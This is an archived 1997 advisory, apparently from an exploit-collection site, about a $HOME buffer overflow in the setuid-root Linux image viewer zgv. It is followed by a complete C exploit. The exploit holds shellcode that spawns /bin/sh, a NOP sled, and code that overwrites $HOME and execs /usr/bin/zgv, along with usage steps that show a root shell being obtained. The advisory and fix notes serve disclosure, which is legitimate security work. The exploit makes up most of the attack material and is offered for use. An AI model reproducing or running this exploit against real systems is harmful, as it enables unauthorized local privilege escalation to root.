zgv $HOME overflow

Summary
Description:zgv, which is setuid r00t on many systems, takes untrusted environmental information ($HOME) and copies it into an automatic character buffer, thus allowing a standard buffer overflow.
Author:ksrt <ksrt@DEC.NET> sent the advisory, beastmaster wrote the exploit code
Compromise: root (local)
Vulnerable Systems:Linux, Redhat 3.0.3 - 4.1, anything else running zgv setuid root
Date:19 June 1997
Notes:Note that the exploit is appended to the advisory.
Details


Date: Thu, 19 Jun 1997 14:15:42 -0700
From: ksrt <ksrt@DEC.NET>
To: best-of-security@suburbia.net
Subject: BoS:      svgalib/zgv


                                                          KSR[T] Advisory #001
                                                          Date:  June 09, 1997
                                                          ID #:  lin-svga-001

Operating System(s): Redhat Linux 3.0.3 - 4.1 / Any Linux with zgv setuid root.

Affected Program:    svgalib/zgv-2.7 ( an svgalib GIF/JPG viewer )

Problem Description: svgalib 1.2.10 and below do not properly revoke
                     privileges, and through the use of saved user ids,
                     any svgalib application may still be vulnerable to
                     buffer overruns(stack overwrites).

                     zgv will take data from an environment variable (HOME),
                     and copies the entire length of the envirnment variable
                     into an automatic character buffer.  The result is that
                     arbitrary code may be executed as root.  There are also
                     overflows on the command line and through stdin.

Compromise:          With zgv, the consequences are minimal, as only a user
                     who has access to the console can exploit this hole.
                     However, most svgalib applications are poorly written
                     from a security standpoint and the potential compromise
                     may be greater with other applications.

Patch/Fix:           svgalib-1.2.11 will address this security issue.  Look
                     for our upcoming paper on vulnerabilities in svgalib
                     that will explain proper programming methods and other
                     potential problems with svgalib applications.


---

Please note that this was not a full audit of zgv, and there may be other
security problems related to zgv.

-----
KSR[T] Website : http://www.dec.net/ksrt
E-mail: ksrt@dec.net

/*
 *
 * zgv exploit coded by BeastMaster V on June 20, 1997
 *
 * USAGE:
 *   For some strage reason, the filename length of this
 *   particular exploit must me one character long, otherwise you
 *   will be drop into a normal unpriviledged shell. Go Figure....
 *
 *   $ cp zgv_exploit.c n.c
 *   $ cc -o n n.c
 *   $ ./n
 *   Oak driver: Unknown chipset (id =  0)
 *   bash#
 *
 * EXPLANATION: zgv (suid root) does not check bounds for $HOME env.
 * TEMPORARY FIX:  chmod u-s /usr/bin/zgv
 * NOTE: Don't forget to visit http://www.rootshell.com for more exploits.
 * DISCLAIMER: Please use this in a responsible manner.
 * 
 */

#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>

char *shellcode =
  "\x31\xc0\xb0\x31\xcd\x80\x93\x31\xc0\xb0\x17\xcd\x80\x68\x59\x58\xff\xe1"
  "\xff\xd4\x31\xc0\x99\x89\xcf\xb0\x2e\x40\xae\x75\xfd\x89\x39\x89\x51\x04"
  "\x89\xfb\x40\xae\x75\xfd\x88\x57\xff\xb0\x0b\xcd\x80\x31\xc0\x40\x31\xdb"
  "\xcd\x80/"
  "/bin/sh"
  "0";

char *get_sp() {
   asm("movl %esp,%eax");
}

#define bufsize 4096
char buffer[bufsize];

main() {
  int i;

  for (i = 0; i < bufsize - 4; i += 4)
    *(char **)&buffer[i] = get_sp() -4675;

  memset(buffer, 0x90, 512);
  memcpy(&buffer[512], shellcode, strlen(shellcode));

  buffer[bufsize - 1] = 0;

  setenv("HOME", buffer, 1);

  execl("/usr/bin/zgv", "/usr/bin/zgv", NULL);
}

More Exploits!

The master index of all exploits is available here (Very large file)
Or you can pick your favorite operating system:
All OS's Linux Solaris/SunOS Micro$oft
*BSD Macintosh AIX IRIX
ULTRIX/Digital UNIX HP/UX SCO Remote exploits

This page is part of Fyodor's exploit world. For a free program to automate scanning your network for vulnerable hosts and services, check out my network mapping tool, nmap. Or try these Insecure.Org resources: